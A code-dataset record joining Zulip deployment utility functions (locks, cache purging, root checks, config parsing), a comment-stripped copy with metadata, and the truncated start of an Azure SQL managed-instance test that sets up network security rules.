"--dry-run", action="store_true",
help="If specified then script will only print the caches "
"that it will delete/keep back. It will not delete any cache.")
parser.add_argument(
"--verbose", action="store_true",
help="If specified then script will print a detailed report "
"of what is being will deleted/kept back.")
parser.add_argument(
"--no-print-headings", dest="no_headings", action="store_true",
help="If specified then script will not print headings for "
"what will be deleted/kept back.")
args = parser.parse_args()
args.verbose |= args.dry_run # Always print a detailed report in case of dry run.
return args
def get_deploy_root() -> str:
return os.path.realpath(
os.path.normpath(os.path.join(os.path.dirname(__file__), "..", "..")),
)
def get_deployment_version(extract_path: str) -> str:
version = '0.0.0'
for item in os.listdir(extract_path):
item_path = os.path.join(extract_path, item)
if item.startswith('zulip-server') and os.path.isdir(item_path):
with open(os.path.join(item_path, 'version.py')) as f:
result = re.search('ZULIP_VERSION = "(.*)"', f.read())
if result:
version = result.groups()[0]
break
return version
def is_invalid_upgrade(current_version: str, new_version: str) -> bool:
if new_version > '1.4.3' and current_version <= '1.3.10':
return True
return False
def subprocess_text_output(args: Sequence[str]) -> str:
return subprocess.check_output(args, universal_newlines=True).strip()
def get_zulip_pwent() -> pwd.struct_passwd:
deploy_root_uid = os.stat(get_deploy_root()).st_uid
if deploy_root_uid != 0:
return pwd.getpwuid(deploy_root_uid)
# In the case that permissions got messed up and the deployment
# directory is unexpectedly owned by root, we fallback to the
# `zulip` user as that's the correct value in production.
return pwd.getpwnam("zulip")
def get_postgres_pwent() -> pwd.struct_passwd:
try:
return pwd.getpwnam("postgres")
except KeyError:
return get_zulip_pwent()
def su_to_zulip(save_suid: bool = False) -> None:
"""Warning: su_to_zulip assumes that the zulip checkout is owned by
the zulip user (or whatever normal user is running the Zulip
installation). It should never be run from the installer or other
production contexts before /home/zulip/deployments/current is
created."""
pwent = get_zulip_pwent()
os.setgid(pwent.pw_gid)
if save_suid:
os.setresuid(pwent.pw_uid, pwent.pw_uid, os.getuid())
else:
os.setuid(pwent.pw_uid)
os.environ['HOME'] = pwent.pw_dir
def make_deploy_path() -> str:
timestamp = datetime.datetime.now().strftime(TIMESTAMP_FORMAT)
return os.path.join(DEPLOYMENTS_DIR, timestamp)
TEMPLATE_DATABASE_DIR = "test-backend/databases"
def get_dev_uuid_var_path(create_if_missing: bool = False) -> str:
zulip_path = get_deploy_root()
uuid_path = os.path.join(os.path.realpath(os.path.dirname(zulip_path)), ".zulip-dev-uuid")
if os.path.exists(uuid_path):
with open(uuid_path) as f:
zulip_uuid = f.read().strip()
else:
if create_if_missing:
zulip_uuid = str(uuid.uuid4())
# We need root access here, since the path will be under /srv/ in the
# development environment.
run_as_root(["sh", "-c", 'echo "$1" > "$2"', "-",
zulip_uuid, uuid_path])
else:
raise AssertionError("Missing UUID file; please run tools/provision!")
result_path = os.path.join(zulip_path, "var", zulip_uuid)
os.makedirs(result_path, exist_ok=True)
return result_path
def get_deployment_lock(error_rerun_script: str) -> None:
start_time = time.time()
got_lock = False
while time.time() - start_time < 300:
try:
os.mkdir(LOCK_DIR)
got_lock = True
break
except OSError:
print(WARNING + "Another deployment in progress; waiting for lock... " +
"(If no deployment is running, rmdir {})".format(LOCK_DIR) + ENDC)
sys.stdout.flush()
time.sleep(3)
if not got_lock:
print(FAIL + "Deployment already in progress. Please run\n" +
" {}\n".format(error_rerun_script) +
"manually when the previous deployment finishes, or run\n" +
" rmdir {}\n".format(LOCK_DIR) +
"if the previous deployment crashed." +
ENDC)
sys.exit(1)
def release_deployment_lock() -> None:
shutil.rmtree(LOCK_DIR)
def run(args: Sequence[str], **kwargs: Any) -> None:
# Output what we're doing in the `set -x` style
print("+ {}".format(" ".join(map(shlex.quote, args))))
try:
subprocess.check_call(args, **kwargs)
except subprocess.CalledProcessError:
print()
print(WHITEONRED + "Error running a subcommand of {}: {}".format(
sys.argv[0], " ".join(map(shlex.quote, args)),
) + ENDC)
print(WHITEONRED + "Actual error output for the subcommand is just above this." +
ENDC)
print()
raise
def log_management_command(cmd: str, log_path: str) -> None:
log_dir = os.path.dirname(log_path)
if not os.path.exists(log_dir):
os.makedirs(log_dir)
formatter = logging.Formatter("%(asctime)s: %(message)s")
file_handler = logging.FileHandler(log_path)
file_handler.setFormatter(formatter)
logger = logging.getLogger("zulip.management")
logger.addHandler(file_handler)
logger.setLevel(logging.INFO)
logger.info("Ran '%s'", cmd)
def get_environment() -> str:
if os.path.exists(DEPLOYMENTS_DIR):
return "prod"
return "dev"
def get_recent_deployments(threshold_days: int) -> Set[str]:
# Returns a list of deployments not older than threshold days
# including `/root/zulip` directory if it exists.
recent = set()
threshold_date = datetime.datetime.now() - datetime.timedelta(days=threshold_days)
for dir_name in os.listdir(DEPLOYMENTS_DIR):
target_dir = os.path.join(DEPLOYMENTS_DIR, dir_name)
if not os.path.isdir(target_dir):
# Skip things like uwsgi sockets, symlinks, etc.
continue
if not os.path.exists(os.path.join(target_dir, "zerver")):
# Skip things like "lock" that aren't actually a deployment directory
continue
try:
date = datetime.datetime.strptime(dir_name, TIMESTAMP_FORMAT)
if date >= threshold_date:
recent.add(target_dir)
except ValueError:
# Always include deployments whose name is not in the format of a timestamp.
recent.add(target_dir)
# If it is a symlink then include the target as well.
if os.path.islink(target_dir):
recent.add(os.path.realpath(target_dir))
if os.path.exists("/root/zulip"):
recent.add("/root/zulip")
return recent
def get_threshold_timestamp(threshold_days: int) -> int:
# Given number of days, this function returns timestamp corresponding
# to the time prior to given number of days.
threshold = datetime.datetime.now() - datetime.timedelta(days=threshold_days)
threshold_timestamp = int(time.mktime(threshold.utctimetuple()))
return threshold_timestamp
def get_caches_to_be_purged(caches_dir: str, caches_in_use: Set[str], threshold_days: int) -> Set[str]:
# Given a directory containing caches, a list of caches in use
# and threshold days, this function return a list of caches
# which can be purged. Remove the cache only if it is:
# 1: Not in use by the current installation(in dev as well as in prod).
# 2: Not in use by a deployment not older than `threshold_days`(in prod).
# 3: Not in use by '/root/zulip'.
# 4: Not older than `threshold_days`.
caches_to_purge = set()
threshold_timestamp = get_threshold_timestamp(threshold_days)
for cache_dir_base in os.listdir(caches_dir):
cache_dir = os.path.join(caches_dir, cache_dir_base)
if cache_dir in caches_in_use:
# Never purge a cache which is in use.
continue
if os.path.getctime(cache_dir) < threshold_timestamp:
caches_to_purge.add(cache_dir)
return caches_to_purge
def purge_unused_caches(
caches_dir: str, caches_in_use: Set[str], cache_type: str, args: argparse.Namespace,
) -> None:
all_caches = {os.path.join(caches_dir, cache) for cache in os.listdir(caches_dir)}
caches_to_purge = get_caches_to_be_purged(caches_dir, caches_in_use, args.threshold_days)
caches_to_keep = all_caches - caches_to_purge
may_be_perform_purging(
caches_to_purge, caches_to_keep, cache_type, args.dry_run, args.verbose, args.no_headings)
if args.verbose:
print("Done!")
def generate_sha1sum_emoji(zulip_path: str) -> str:
sha = hashlib.sha1()
filenames = [
'static/assets/zulip-emoji/zulip.png',
'tools/setup/emoji/emoji_map.json',
'tools/setup/emoji/build_emoji',
'tools/setup/emoji/emoji_setup_utils.py',
'tools/setup/emoji/emoji_names.py',
]
for filename in filenames:
file_path = os.path.join(zulip_path, filename)
with open(file_path, 'rb') as reader:
sha.update(reader.read())
# Take into account the version of `emoji-datasource-google` package
# while generating success stamp.
PACKAGE_FILE_PATH = os.path.join(zulip_path, 'package.json')
with open(PACKAGE_FILE_PATH) as fp:
parsed_package_file = json.load(fp)
dependency_data = parsed_package_file['dependencies']
if 'emoji-datasource-google' in dependency_data:
with open(os.path.join(zulip_path, "yarn.lock")) as fp:
(emoji_datasource_version,) = re.findall(
r"^emoji-datasource-google@"
+ re.escape(dependency_data["emoji-datasource-google"])
+ r':\n version "(.*)"',
fp.read(),
re.M,
)
else:
emoji_datasource_version = "0"
sha.update(emoji_datasource_version.encode())
return sha.hexdigest()
def may_be_perform_purging(
dirs_to_purge: Set[str],
dirs_to_keep: Set[str],
dir_type: str,
dry_run: bool,
verbose: bool,
no_headings: bool,
) -> None:
if dry_run:
print("Performing a dry run...")
if not no_headings:
print("Cleaning unused {}s...".format(dir_type))
for directory in dirs_to_purge:
if verbose:
print("Cleaning unused {}: {}".format(dir_type, directory))
if not dry_run:
run_as_root(["rm", "-rf", directory])
for directory in dirs_to_keep:
if verbose:
print("Keeping used {}: {}".format(dir_type, directory))
@functools.lru_cache(None)
def parse_os_release() -> Dict[str, str]:
"""
Example of the useful subset of the data:
{
'ID': 'ubuntu',
'VERSION_ID': '18.04',
'NAME': 'Ubuntu',
'VERSION': '18.04.3 LTS (Bionic Beaver)',
'PRETTY_NAME': 'Ubuntu 18.04.3 LTS',
}
VERSION_CODENAME (e.g. 'bionic') is nice and human-readable, but
we avoid using it, as it is not available on RHEL-based platforms.
"""
distro_info = {} # type: Dict[str, str]
with open('/etc/os-release') as fp:
for line in fp:
line = line.strip()
if not line or line.startswith('#'):
# The line may be blank or a comment, see:
# https://www.freedesktop.org/software/systemd/man/os-release.html
continue
k, v = line.split('=', 1)
[distro_info[k]] = shlex.split(v)
return distro_info
@functools.lru_cache(None)
def os_families() -> Set[str]:
"""
Known families:
debian (includes: debian, ubuntu)
ubuntu (includes: ubuntu)
fedora (includes: fedora, rhel, centos)
rhel (includes: rhel, centos)
centos (includes: centos)
"""
distro_info = parse_os_release()
return {distro_info["ID"], *distro_info.get("ID_LIKE", "").split()}
def files_and_string_digest(filenames: Sequence[str],
extra_strings: Sequence[str]) -> str:
# see is_digest_obsolete for more context
sha1sum = hashlib.sha1()
for fn in filenames:
with open(fn, 'rb') as file_to_hash:
sha1sum.update(file_to_hash.read())
for extra_string in extra_strings:
sha1sum.update(extra_string.encode("utf-8"))
return sha1sum.hexdigest()
def is_digest_obsolete(hash_name: str,
filenames: Sequence[str],
extra_strings: Sequence[str] = []) -> bool:
'''
In order to determine if we need to run some
process, we calculate a digest of the important
files and strings whose respective contents
or values may indicate such a need.
filenames = files we should hash the contents of
extra_strings = strings we should hash directly
Grep for callers to see examples of how this is used.
To elaborate on extra_strings, they will typically
be things like:
- package versions (that we import)
- settings values (that we stringify with
json, deterministically)
'''
last_hash_path = os.path.join(get_dev_uuid_var_path(), hash_name)
try:
with open(last_hash_path) as f:
old_hash = f.read()
except FileNotFoundError:
# This is normal for a fresh checkout--a missing
# digest is an obsolete digest.
return True
new_hash = files_and_string_digest(filenames, extra_strings)
return new_hash != old_hash
def write_new_digest(hash_name: str,
filenames: Sequence[str],
extra_strings: Sequence[str] = []) -> None:
hash_path = os.path.join(get_dev_uuid_var_path(), hash_name)
new_hash = files_and_string_digest(filenames, extra_strings)
with open(hash_path, 'w') as f:
f.write(new_hash)
# Be a little verbose here--our callers ensure we
# only write new digests when things have changed, and
# making this system more transparent to developers
# can help them troubleshoot provisioning glitches.
print('New digest written to: ' + hash_path)
def is_root() -> bool:
if 'posix' in os.name and os.geteuid() == 0:
return True
return False
def run_as_root(args: List[str], **kwargs: Any) -> None:
sudo_args = kwargs.pop('sudo_args', [])
if not is_root():
args = ['sudo', *sudo_args, '--', *args]
run(args, **kwargs)
def assert_not_running_as_root() -> None:
script_name = os.path.abspath(sys.argv[0])
if is_root():
pwent = get_zulip_pwent()
msg = ("{shortname} should not be run as root. Use `su {user}` to switch to the 'zulip'\n"
"user before rerunning this, or use \n su {user} -c '{name} ...'\n"
"to switch users and run this as a single command.").format(
name=script_name,
shortname=os.path.basename(script_name),
user=pwent.pw_name)
print(msg)
sys.exit(1)
def assert_running_as_root(strip_lib_from_paths: bool=False) -> None:
script_name = os.path.abspath(sys.argv[0])
# Since these Python scripts are run inside a thin shell wrapper,
# we need to replace the paths in order to ensure we instruct
# users to (re)run the right command.
if strip_lib_from_paths:
script_name = script_name.replace("scripts/lib/upgrade", "scripts/upgrade")
if not is_root():
print("{} must be run as root.".format(script_name))
sys.exit(1)
def get_config(
config_file: configparser.RawConfigParser,
section: str,
key: str,
default_value: str = "",
) -> str:
if config_file.has_option(section, key):
return config_file.get(section, key)
return default_value
def set_config(
config_file: configparser.RawConfigParser,
section: str,
key: str,
value: str,
) -> None:
if not config_file.has_section(section):
config_file.add_section(section)
config_file.set(section, key, value)
def get_config_file() -> configparser.RawConfigParser:
config_file = configparser.RawConfigParser()
config_file.read("/etc/zulip/zulip.conf")
return config_file
def get_deploy_options(config_file: configparser.RawConfigParser) -> List[str]:
return get_config(config_file, 'deployment', 'deploy_options', "").strip().split()
def get_or_create_dev_uuid_var_path(path: str) -> str:
absolute_path = '{}/{}'.format(get_dev_uuid_var_path(), path)
os.makedirs(absolute_path, exist_ok=True)
return absolute_path
def is_vagrant_env_host(path: str) -> bool:
return '.vagrant' in os.listdir(path)
def deport(netloc: str) -> str:
"""Remove the port from a hostname:port string. Brackets on a literal
IPv6 address are included."""
r = SplitResult("", netloc, "", "", "")
assert r.hostname is not None
return "[" + r.hostname + "]" if ":" in r.hostname else r.hostname
if __name__ == '__main__':
cmd = sys.argv[1]
if cmd == 'make_deploy_path':
print(make_deploy_path())
elif cmd == 'get_dev_uuid':
print(get_dev_uuid_var_path())
| 36.044527
| 103
| 0.648446
|
import argparse
import configparser
import datetime
import functools
import hashlib
import json
import logging
import os
import pwd
import random
import re
import shlex
import shutil
import subprocess
import sys
import time
import uuid
from typing import Any, Dict, List, Sequence, Set
from urllib.parse import SplitResult
DEPLOYMENTS_DIR = "/home/zulip/deployments"
LOCK_DIR = os.path.join(DEPLOYMENTS_DIR, "lock")
TIMESTAMP_FORMAT = '%Y-%m-%d-%H-%M-%S'
OKBLUE = '\033[94m'
OKGREEN = '\033[92m'
WARNING = '\033[93m'
FAIL = '\033[91m'
ENDC = '\033[0m'
BLACKONYELLOW = '\x1b[0;30;43m'
WHITEONRED = '\x1b[0;37;41m'
BOLDRED = '\x1B[1;31m'
GREEN = '\x1b[32m'
YELLOW = '\x1b[33m'
BLUE = '\x1b[34m'
MAGENTA = '\x1b[35m'
CYAN = '\x1b[36m'
def overwrite_symlink(src: str, dst: str) -> None:
dir, base = os.path.split(dst)
while True:
tmp = os.path.join(dir, ".{}.{:010x}".format(base, random.randrange(1 << 40)))
try:
os.symlink(src, tmp)
except FileExistsError:
continue
break
try:
os.rename(tmp, dst)
except Exception:
os.remove(tmp)
raise
def parse_cache_script_args(description: str) -> argparse.Namespace:
parser = argparse.ArgumentParser(description=description)
parser.add_argument(
"--threshold", dest="threshold_days", type=int, default=14,
metavar="<days>", help="Any cache which is not in "
"use by a deployment not older than threshold days(current "
"installation in dev) and older than threshold days will be "
"deleted. (defaults to 14)")
parser.add_argument(
"--dry-run", action="store_true",
help="If specified then script will only print the caches "
"that it will delete/keep back. It will not delete any cache.")
parser.add_argument(
"--verbose", action="store_true",
help="If specified then script will print a detailed report "
"of what is being will deleted/kept back.")
parser.add_argument(
"--no-print-headings", dest="no_headings", action="store_true",
help="If specified then script will not print headings for "
"what will be deleted/kept back.")
args = parser.parse_args()
args.verbose |= args.dry_run return args
def get_deploy_root() -> str:
return os.path.realpath(
os.path.normpath(os.path.join(os.path.dirname(__file__), "..", "..")),
)
def get_deployment_version(extract_path: str) -> str:
version = '0.0.0'
for item in os.listdir(extract_path):
item_path = os.path.join(extract_path, item)
if item.startswith('zulip-server') and os.path.isdir(item_path):
with open(os.path.join(item_path, 'version.py')) as f:
result = re.search('ZULIP_VERSION = "(.*)"', f.read())
if result:
version = result.groups()[0]
break
return version
def is_invalid_upgrade(current_version: str, new_version: str) -> bool:
if new_version > '1.4.3' and current_version <= '1.3.10':
return True
return False
def subprocess_text_output(args: Sequence[str]) -> str:
return subprocess.check_output(args, universal_newlines=True).strip()
def get_zulip_pwent() -> pwd.struct_passwd:
deploy_root_uid = os.stat(get_deploy_root()).st_uid
if deploy_root_uid != 0:
return pwd.getpwuid(deploy_root_uid)
return pwd.getpwnam("zulip")
def get_postgres_pwent() -> pwd.struct_passwd:
try:
return pwd.getpwnam("postgres")
except KeyError:
return get_zulip_pwent()
def su_to_zulip(save_suid: bool = False) -> None:
pwent = get_zulip_pwent()
os.setgid(pwent.pw_gid)
if save_suid:
os.setresuid(pwent.pw_uid, pwent.pw_uid, os.getuid())
else:
os.setuid(pwent.pw_uid)
os.environ['HOME'] = pwent.pw_dir
def make_deploy_path() -> str:
timestamp = datetime.datetime.now().strftime(TIMESTAMP_FORMAT)
return os.path.join(DEPLOYMENTS_DIR, timestamp)
TEMPLATE_DATABASE_DIR = "test-backend/databases"
def get_dev_uuid_var_path(create_if_missing: bool = False) -> str:
zulip_path = get_deploy_root()
uuid_path = os.path.join(os.path.realpath(os.path.dirname(zulip_path)), ".zulip-dev-uuid")
if os.path.exists(uuid_path):
with open(uuid_path) as f:
zulip_uuid = f.read().strip()
else:
if create_if_missing:
zulip_uuid = str(uuid.uuid4())
# We need root access here, since the path will be under /srv/ in the
# development environment.
run_as_root(["sh", "-c", 'echo "$1" > "$2"', "-",
zulip_uuid, uuid_path])
else:
raise AssertionError("Missing UUID file; please run tools/provision!")
result_path = os.path.join(zulip_path, "var", zulip_uuid)
os.makedirs(result_path, exist_ok=True)
return result_path
def get_deployment_lock(error_rerun_script: str) -> None:
start_time = time.time()
got_lock = False
while time.time() - start_time < 300:
try:
os.mkdir(LOCK_DIR)
got_lock = True
break
except OSError:
print(WARNING + "Another deployment in progress; waiting for lock... " +
"(If no deployment is running, rmdir {})".format(LOCK_DIR) + ENDC)
sys.stdout.flush()
time.sleep(3)
if not got_lock:
print(FAIL + "Deployment already in progress. Please run\n" +
" {}\n".format(error_rerun_script) +
"manually when the previous deployment finishes, or run\n" +
" rmdir {}\n".format(LOCK_DIR) +
"if the previous deployment crashed." +
ENDC)
sys.exit(1)
def release_deployment_lock() -> None:
shutil.rmtree(LOCK_DIR)
def run(args: Sequence[str], **kwargs: Any) -> None:
# Output what we're doing in the `set -x` style
print("+ {}".format(" ".join(map(shlex.quote, args))))
try:
subprocess.check_call(args, **kwargs)
except subprocess.CalledProcessError:
print()
print(WHITEONRED + "Error running a subcommand of {}: {}".format(
sys.argv[0], " ".join(map(shlex.quote, args)),
) + ENDC)
print(WHITEONRED + "Actual error output for the subcommand is just above this." +
ENDC)
print()
raise
def log_management_command(cmd: str, log_path: str) -> None:
log_dir = os.path.dirname(log_path)
if not os.path.exists(log_dir):
os.makedirs(log_dir)
formatter = logging.Formatter("%(asctime)s: %(message)s")
file_handler = logging.FileHandler(log_path)
file_handler.setFormatter(formatter)
logger = logging.getLogger("zulip.management")
logger.addHandler(file_handler)
logger.setLevel(logging.INFO)
logger.info("Ran '%s'", cmd)
def get_environment() -> str:
if os.path.exists(DEPLOYMENTS_DIR):
return "prod"
return "dev"
def get_recent_deployments(threshold_days: int) -> Set[str]:
recent = set()
threshold_date = datetime.datetime.now() - datetime.timedelta(days=threshold_days)
for dir_name in os.listdir(DEPLOYMENTS_DIR):
target_dir = os.path.join(DEPLOYMENTS_DIR, dir_name)
if not os.path.isdir(target_dir):
continue
if not os.path.exists(os.path.join(target_dir, "zerver")):
continue
try:
date = datetime.datetime.strptime(dir_name, TIMESTAMP_FORMAT)
if date >= threshold_date:
recent.add(target_dir)
except ValueError:
# Always include deployments whose name is not in the format of a timestamp.
recent.add(target_dir)
# If it is a symlink then include the target as well.
if os.path.islink(target_dir):
recent.add(os.path.realpath(target_dir))
if os.path.exists("/root/zulip"):
recent.add("/root/zulip")
return recent
def get_threshold_timestamp(threshold_days: int) -> int:
# Given number of days, this function returns timestamp corresponding
# to the time prior to given number of days.
threshold = datetime.datetime.now() - datetime.timedelta(days=threshold_days)
threshold_timestamp = int(time.mktime(threshold.utctimetuple()))
return threshold_timestamp
def get_caches_to_be_purged(caches_dir: str, caches_in_use: Set[str], threshold_days: int) -> Set[str]:
# Given a directory containing caches, a list of caches in use
# and threshold days, this function return a list of caches
# which can be purged. Remove the cache only if it is:
# 1: Not in use by the current installation(in dev as well as in prod).
# 2: Not in use by a deployment not older than `threshold_days`(in prod).
# 3: Not in use by '/root/zulip'.
# 4: Not older than `threshold_days`.
caches_to_purge = set()
threshold_timestamp = get_threshold_timestamp(threshold_days)
for cache_dir_base in os.listdir(caches_dir):
cache_dir = os.path.join(caches_dir, cache_dir_base)
if cache_dir in caches_in_use:
# Never purge a cache which is in use.
continue
if os.path.getctime(cache_dir) < threshold_timestamp:
caches_to_purge.add(cache_dir)
return caches_to_purge
def purge_unused_caches(
caches_dir: str, caches_in_use: Set[str], cache_type: str, args: argparse.Namespace,
) -> None:
all_caches = {os.path.join(caches_dir, cache) for cache in os.listdir(caches_dir)}
caches_to_purge = get_caches_to_be_purged(caches_dir, caches_in_use, args.threshold_days)
caches_to_keep = all_caches - caches_to_purge
may_be_perform_purging(
caches_to_purge, caches_to_keep, cache_type, args.dry_run, args.verbose, args.no_headings)
if args.verbose:
print("Done!")
def generate_sha1sum_emoji(zulip_path: str) -> str:
sha = hashlib.sha1()
filenames = [
'static/assets/zulip-emoji/zulip.png',
'tools/setup/emoji/emoji_map.json',
'tools/setup/emoji/build_emoji',
'tools/setup/emoji/emoji_setup_utils.py',
'tools/setup/emoji/emoji_names.py',
]
for filename in filenames:
file_path = os.path.join(zulip_path, filename)
with open(file_path, 'rb') as reader:
sha.update(reader.read())
# Take into account the version of `emoji-datasource-google` package
# while generating success stamp.
PACKAGE_FILE_PATH = os.path.join(zulip_path, 'package.json')
with open(PACKAGE_FILE_PATH) as fp:
parsed_package_file = json.load(fp)
dependency_data = parsed_package_file['dependencies']
if 'emoji-datasource-google' in dependency_data:
with open(os.path.join(zulip_path, "yarn.lock")) as fp:
(emoji_datasource_version,) = re.findall(
r"^emoji-datasource-google@"
+ re.escape(dependency_data["emoji-datasource-google"])
+ r':\n version "(.*)"',
fp.read(),
re.M,
)
else:
emoji_datasource_version = "0"
sha.update(emoji_datasource_version.encode())
return sha.hexdigest()
def may_be_perform_purging(
dirs_to_purge: Set[str],
dirs_to_keep: Set[str],
dir_type: str,
dry_run: bool,
verbose: bool,
no_headings: bool,
) -> None:
if dry_run:
print("Performing a dry run...")
if not no_headings:
print("Cleaning unused {}s...".format(dir_type))
for directory in dirs_to_purge:
if verbose:
print("Cleaning unused {}: {}".format(dir_type, directory))
if not dry_run:
run_as_root(["rm", "-rf", directory])
for directory in dirs_to_keep:
if verbose:
print("Keeping used {}: {}".format(dir_type, directory))
@functools.lru_cache(None)
def parse_os_release() -> Dict[str, str]:
distro_info = {} # type: Dict[str, str]
with open('/etc/os-release') as fp:
for line in fp:
line = line.strip()
if not line or line.startswith(' # The line may be blank or a comment, see:
# https://www.freedesktop.org/software/systemd/man/os-release.html
continue
k, v = line.split('=', 1)
[distro_info[k]] = shlex.split(v)
return distro_info
@functools.lru_cache(None)
def os_families() -> Set[str]:
distro_info = parse_os_release()
return {distro_info["ID"], *distro_info.get("ID_LIKE", "").split()}
def files_and_string_digest(filenames: Sequence[str],
extra_strings: Sequence[str]) -> str:
# see is_digest_obsolete for more context
sha1sum = hashlib.sha1()
for fn in filenames:
with open(fn, 'rb') as file_to_hash:
sha1sum.update(file_to_hash.read())
for extra_string in extra_strings:
sha1sum.update(extra_string.encode("utf-8"))
return sha1sum.hexdigest()
def is_digest_obsolete(hash_name: str,
filenames: Sequence[str],
extra_strings: Sequence[str] = []) -> bool:
last_hash_path = os.path.join(get_dev_uuid_var_path(), hash_name)
try:
with open(last_hash_path) as f:
old_hash = f.read()
except FileNotFoundError:
# This is normal for a fresh checkout--a missing
# digest is an obsolete digest.
return True
new_hash = files_and_string_digest(filenames, extra_strings)
return new_hash != old_hash
def write_new_digest(hash_name: str,
filenames: Sequence[str],
extra_strings: Sequence[str] = []) -> None:
hash_path = os.path.join(get_dev_uuid_var_path(), hash_name)
new_hash = files_and_string_digest(filenames, extra_strings)
with open(hash_path, 'w') as f:
f.write(new_hash)
# Be a little verbose here--our callers ensure we
# only write new digests when things have changed, and
# making this system more transparent to developers
# can help them troubleshoot provisioning glitches.
print('New digest written to: ' + hash_path)
def is_root() -> bool:
if 'posix' in os.name and os.geteuid() == 0:
return True
return False
def run_as_root(args: List[str], **kwargs: Any) -> None:
sudo_args = kwargs.pop('sudo_args', [])
if not is_root():
args = ['sudo', *sudo_args, '--', *args]
run(args, **kwargs)
def assert_not_running_as_root() -> None:
script_name = os.path.abspath(sys.argv[0])
if is_root():
pwent = get_zulip_pwent()
msg = ("{shortname} should not be run as root. Use `su {user}` to switch to the 'zulip'\n"
"user before rerunning this, or use \n su {user} -c '{name} ...'\n"
"to switch users and run this as a single command.").format(
name=script_name,
shortname=os.path.basename(script_name),
user=pwent.pw_name)
print(msg)
sys.exit(1)
def assert_running_as_root(strip_lib_from_paths: bool=False) -> None:
script_name = os.path.abspath(sys.argv[0])
# Since these Python scripts are run inside a thin shell wrapper,
# we need to replace the paths in order to ensure we instruct
# users to (re)run the right command.
if strip_lib_from_paths:
script_name = script_name.replace("scripts/lib/upgrade", "scripts/upgrade")
if not is_root():
print("{} must be run as root.".format(script_name))
sys.exit(1)
def get_config(
config_file: configparser.RawConfigParser,
section: str,
key: str,
default_value: str = "",
) -> str:
if config_file.has_option(section, key):
return config_file.get(section, key)
return default_value
def set_config(
config_file: configparser.RawConfigParser,
section: str,
key: str,
value: str,
) -> None:
if not config_file.has_section(section):
config_file.add_section(section)
config_file.set(section, key, value)
def get_config_file() -> configparser.RawConfigParser:
config_file = configparser.RawConfigParser()
config_file.read("/etc/zulip/zulip.conf")
return config_file
def get_deploy_options(config_file: configparser.RawConfigParser) -> List[str]:
return get_config(config_file, 'deployment', 'deploy_options', "").strip().split()
def get_or_create_dev_uuid_var_path(path: str) -> str:
absolute_path = '{}/{}'.format(get_dev_uuid_var_path(), path)
os.makedirs(absolute_path, exist_ok=True)
return absolute_path
def is_vagrant_env_host(path: str) -> bool:
return '.vagrant' in os.listdir(path)
def deport(netloc: str) -> str:
r = SplitResult("", netloc, "", "", "")
assert r.hostname is not None
return "[" + r.hostname + "]" if ":" in r.hostname else r.hostname
if __name__ == '__main__':
cmd = sys.argv[1]
if cmd == 'make_deploy_path':
print(make_deploy_path())
elif cmd == 'get_dev_uuid':
print(get_dev_uuid_var_path())
| true
| true
|
f707cd250d370f16f94ca0d06c3d986e3b974eec
| 12,396
|
py
|
Python
|
sdk/sql/azure-mgmt-sql/tests/test_cli_mgmt_sql_managed_instance.py
|
zeinab-mk/azure-sdk-for-python
|
847e95a542506239db4aa6c12fa5ae35aa7d5e56
|
[
"MIT"
] | 1
|
2022-03-08T04:21:07.000Z
|
2022-03-08T04:21:07.000Z
|
sdk/sql/azure-mgmt-sql/tests/test_cli_mgmt_sql_managed_instance.py
|
zeinab-mk/azure-sdk-for-python
|
847e95a542506239db4aa6c12fa5ae35aa7d5e56
|
[
"MIT"
] | null | null | null |
sdk/sql/azure-mgmt-sql/tests/test_cli_mgmt_sql_managed_instance.py
|
zeinab-mk/azure-sdk-for-python
|
847e95a542506239db4aa6c12fa5ae35aa7d5e56
|
[
"MIT"
] | null | null | null |
# coding: utf-8
#-------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#--------------------------------------------------------------------------
# Current Operation Coverage:
# ManagedInstances: 6/8
# ManagedInstanceOperations: 1/3
import unittest
import azure.mgmt.sql
from azure.core.exceptions import HttpResponseError
from devtools_testutils import AzureMgmtRecordedTestCase, RandomNameResourceGroupPreparer, ResourceGroupPreparer, recorded_by_proxy
AZURE_LOCATION = 'eastus'
class MgmtSqlTest(AzureMgmtRecordedTestCase):
def setup_method(self, method):
self.client = self.create_mgmt_client(
azure.mgmt.sql.SqlManagementClient
)
# self.mgmt_client180601 = self.create_mgmt_client(
# azure.mgmt.sql.SqlManagementClient,
# api_version="2018-06-01-preview"
# )
# if self.is_live:
# from azure.mgmt.network import NetworkManagementClient
# self.network_client = self.create_mgmt_client(
# NetworkManagementClient
# )
def create_virtual_network(self, group_name, location, security_group_name, route_table_name, network_name, subnet_name):
# Create network security group
network_security_group = self.network_client.network_security_groups.begin_create_or_update(
group_name,
security_group_name,
{
"location": location
}
).result()
# Create security rule
security_rule = self.network_client.security_rules.begin_create_or_update(
group_name,
security_group_name,
"allow_tds_inbound",
{
"protocol": "Tcp",
"access": "Allow",
"direction": "Inbound",
"source_port_range": "*",
"source_address_prefix": "10.0.0.0/16",
"destination_address_prefix": "*",
"destination_port_range": "1433",
"priority": "1000"
}
).result()
# Create security rule
security_rule = self.network_client.security_rules.begin_create_or_update(
group_name,
security_group_name,
"allow_redirect_inbound",
{
"protocol": "Tcp",
"access": "Allow",
"direction": "Inbound",
"source_port_range": "*",
"source_address_prefix": "10.0.0.0/16",
"destination_address_prefix": "*",
"destination_port_range": "11000-11999",
"priority": "1100"
}
).result()
# Create security rule
security_rule = self.network_client.security_rules.begin_create_or_update(
group_name,
security_group_name,
"deny_all_inbound",
{
"protocol": "*",
"access": "Deny",
"direction": "Inbound",
"source_port_range": "*",
"source_address_prefix": "*",
"destination_address_prefix": "*",
"destination_port_range": "*",
"priority": "4096"
}
).result()
# Create security rule
security_rule = self.network_client.security_rules.begin_create_or_update(
group_name,
security_group_name,
"deny_all_outbound",
{
"protocol": "*",
"access": "Deny",
"direction": "Outbound",
"source_port_range": "*",
"source_address_prefix": "*",
"destination_address_prefix": "*",
"destination_port_range": "*",
"priority": "4095"
}
).result()
# Create route table
route_table = self.network_client.route_tables.begin_create_or_update(
group_name,
route_table_name,
{
"location": location
}
).result()
# create virtual network
azure_operation_poller = self.network_client.virtual_networks.begin_create_or_update(
group_name,
network_name,
{
'location': location,
'address_space': {
'address_prefixes': ['10.0.0.0/16']
}
},
)
result_create = azure_operation_poller.result()
# create subnet
async_subnet_creation = self.network_client.subnets.begin_create_or_update(
group_name,
network_name,
subnet_name,
{
'address_prefix': '10.0.0.0/24',
'network_security_group': network_security_group,
'route_table': route_table,
'delegations': [
{
